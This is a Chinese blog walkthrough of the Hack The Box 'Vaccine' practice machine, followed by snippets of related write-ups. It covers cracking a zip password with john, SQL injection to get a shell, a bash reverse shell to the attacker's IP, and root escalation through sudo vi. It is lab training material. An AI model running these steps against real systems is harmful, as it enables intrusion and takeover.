Hack the box vaccine

最新推荐文章于 2024-07-10 08:51:49 发布
最新推荐文章于 2024-07-10 08:51:49 发布
阅读量219 收藏
点赞数
分类专栏: Hack the box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/118445364
版权

上一台靶机的线索FTP账号 ftpuser/mc@F1l3ZilL4
1.日常nmap -sC -sV 10.10.10.46,开放21,22,80端口
2.结合上一台靶机拿到的FTP账号,密码,登录FTP服务器,dir看到backup.zip,拿到备份文件
3.解密,用kali里面的john 先用zip2john backup.zip>hash //生成hash值,解密效率更高
john hash --fork=4 -w /usr/share/wordlists/rockyou.txt 2>/dev/null //解密john文件 --fork指定线程数 -w指定字典 rockyou.txt是kali自带的大字典
//2>/dev/null不输出错误
得到密码:741852963
4.解密zip文件,审计index.php文件,拿到admin用户密码md5值2cb42f8734ea607eefed3b70af13bbd3,cmd5网站解密qwerty789
5.访问网页,直接进到登陆页面,admin/qwerty789,进到dashboard.php,搜索框里面随便搜,发现带了search参数
6.考虑sql注入,注意:这里不能直接拿url跑,而是要burp抓包跑,因为会检测referer头,检测出数据库版本,加os-shell拿到数据库用户shell
7.反弹shell到本地
bash -c ‘bash -i >& /dev/tcp/10.10.16.9/1234 0>&1’
关于这条指令的理解可以看 https://blog.csdn.net/weixin_43486390/article/details/111385962
8.本地拿到是非交互式shell,非常不稳定,可能执行不了几条指令就没了,需要转换成交互式shell
常规操作:python3 -c “import pty;pty.spawn(’/bin/bash’)”
9.拿到交互shell后,由于这题是没有用户flag的,题目已经标明了,所以直接提权拿root flag,由于执行sudo -l命令需要提前拿到用户密码
所以到数据库连接里面去找。去找dashboard这种带搜索功能的,果然拿到用户密码P@s5w0rd!
10.拿到用户密码后sudo -l查看用户可以越权执行的操作
发现/bin/vi /etc/postgresql/11/main/pg_hba.conf
当前数据库用户可以越权编辑pg_hba.conf
11.sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf,输入用户密码,越权后再vi命令行输入:!/bin/bash标识用bin/bash脚本来执行当前程序,由于是用root权限执行的vi
操作,当然拿到的是root shell,拿到flag
参考操作视频:https://www.bilibili.com/video/BV1kq4y1s7HT/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 1984
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
HackTheBox-Vaccine
LYJ20010728的博客
07-27 542
HackTheBox-Vaccine连接配置信息搜集登录FTP破解压缩包密码获取登录密码登录网站getshell升级shell提权 连接配置 参考之前写的连接配置,文章链接 信息搜集 使用nmap对场景给出的ip地址进行扫描 nmap -sS -A 10.10.10.46 发现其开放了21、22和80端口,利用上一场景得到的FTP用户凭据 ftpuser/mc@F1l3ZilL4,尝试登陆FTP服务 登录FTP ftp 10.10.10.46 Name:ftpuser Password:m
HackTheBox - Vaccine
qq_45862635的博客
06-17 921
Hack The Box :: Starting Point - Tier2 - Vaccine
hack the box vaccine 靶场练习
鸥鹭忘机
08-01 1792
收集信息 连接hack the box服务器后第一步依然是扫描靶机。 nmap -sV -sS -F 10.10.10.46 -sV 代表扫描端口和开放的服务信息 -sS 代表用TCP半开式扫描 -F 快速扫描,扫描常用的端口 发现开放了80,21等端口。我们用上一个靶机获取到的账号和密码来连接一下这个ftp服务器,并查看一下有哪一些文件。 ftp 10.10.10.46 //然后更具提示输入账号和密码 ls 发现了一个backup.zip,把它下载下来并解压。 如果被防火墙拦截则可以开启被
Hack The Box : Starting Point - Vaccine
qq_60201815的博客
09-13 668
攻击机:kali-linux 靶机:Oopsie --------------------------------------------------------------------------------------------------------------------------------- 网络配置:操作与Archetype靶机相同,链接:Hack The Box : Starting Point - Archetype_丶 Chave的博客-CSDN博客 渗透过程 已知目标
The Anti-Vaxxer Vaccine-crx插件
04-03
语言:English (United States) 抗vaxxer疫苗是第一个数字疫苗,旨在在线对抗抗缅婆婆婆的传播。 抗vaxxerism几乎只有疫苗。 但它从未像今天那样毒力和危险,导致疫苗接种率下降,疾病爆发和死亡。...
Vaccine
03-17
标题中的“Vaccine”可能指的是一个使用C++编程语言开发的软件项目,它可能是为了模拟疫苗接种过程、管理疫苗库存或者预测疫苗分配等目的而创建的。在这个项目中,C++作为后端语言,提供了高效的数据处理和计算能力...
vaccine
03-08
入门首先,运行开发服务器: $ npm install$ npm run dev 用浏览器打开以查看结果。 您可以通过修改pages/index.js来开始编辑页面。 页面在您编辑文件时自动更新。 可以在上访问。 可以在pages/api/hello.js编辑此...
vaccine-system
04-05
"vaccine-system"是一个简单的疫苗管理系统,它利用了前端框架Vue.js进行开发。Vue.js是当前流行的轻量级JavaScript框架,以数据驱动和组件化为核心,使得构建用户界面变得更加便捷和高效。在这个项目中,我们可以...
Hack The Box 之 10 Vaccine
Angelxiqi的博客
05-07 485
一如既往的详细,给个好评呗~~
hack the box靶场Vaccine靶机
zr1213159840的博客
03-23 3220
开启,看第一题: 问:除了跑了ssh和http服务,还有什么服务? 回答:ftp,使用nmap扫描,能看到结果 nmap -sV -Pn 10.129.95.174 第二个问题: 问:有一个服务时可以匿名登录的,用户名是什么? 回答:anonymous。下意识猜测是ftp服务可以匿名登录,直接在文件管理中使用ftp登录,看到以下结果,然后可以登录,确信是anonymous 并且其中包含一个backup.zip文件,直接下载下来,肯定和后面的题目相关。 说曹操曹操到,第三问 问:可以下载的文件
HackTheBox-Starting Point--Tier 2---Vaccine
七天
11-14 193
输出显示 postgres用户权限下,可以使用sudo权限编辑pg_hba.conf文件。2.FTP允许匿名登录,发现backup.zip。6.访问80端口,admin:qwerty789登录。7.搜索接口使用$searc变量,尝试对其进行注入。4.编辑pg_hba.conf获取shell。3.使用john解密backup.zip。4.backup.zip文件信息泄漏。爆破hash密码,得到密码是。,查看index.php,发现。参数获取一个shell。8.获取反弹shell。
0x03-HackTheBox-Shield
0pr
04-22 528
Shield Video Walkthrough!???? 个人博客地址 Via今天回来继续 HackTheBox 系列。有事耽误了两天。前两天发现 Vaccine 这个机器老是会出现网络问题,我就跳过不做了。那么今天就是 Shield。 目标机器在IP地址 10.10.10.29。 Recon Nmap 只有 80 和 3306 端口开着,一个网站,加一个 mysql server。 攻击者可以继...
【HTB WP】Vaccine
Pz_mstr's Blog
02-23 705
前言 Hack the box - Vaccine WP 原文用onenote写的,懒得搬运了,凑合看吧 这几天试了一下HTB,感觉挺好玩的,属于是kail熟悉练习了 小知识记录 这次用到了zip2john、john和sudo -l,记录一下 zip2john 这东西原理是啥?有源代码的,不过懒得看了,作用是提取加密压缩包哈希信息 john 提取到压缩包哈希信息后,使用 sudo john passwd.hash 进行爆破(应该是有个内置密码本) sudo -l 即sudo --list 可以列出当前用户
靶机渗透_hackthebox__haystack -4
qq_34717555的博客
11-11 1305
获得靶机IP 10.10.10.115 nmap 扫一下 nmap -A IP 得到三个开放端口 Nmap scan report for bogon (10.10.10.115) Host is up (0.28s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open s...
渗透测试练习靶场hackthebox——Starting Point Archetype攻略
TF0xn的博客
09-15 3028
目录连接配置扫描测试445端口连接数据库获取RCE 连接配置 选择EU或USA后,点击上方Download Connection Pack,下载xxxxx.ovpn,在命令行内键入:openvpn xxxxx.ovpn 如图所示,就连接成功了 扫描 根据网站提示,我们需要扫描10.10.10.27,使用nmap进行扫描:nmap -sC -sV 10.10.10.27 -sC:使用默认脚本进行扫描,等同于–script=default -sV:探测开启的端口来获取服务、版本信息 可以发现,目标开启
Hack The Box -----------------------Active
大方子
12-16 6917
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 1055
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 431
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
install.packages("covid19vaccine") Warning in install.packages : package ‘covid19vaccine’ is not available for this version of R A version of this package for your version of R might be available elsewhere, see the ideas at怎么回事
06-12
这个错误提示意味着你正在尝试安装的R包"covid19vaccine"可能不适用于你当前的R版本。你可以尝试以下解决方法: 1. 检查你的R版本是否是最新的版本,如果不是,更新到最新版本。 2. 在CRAN...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值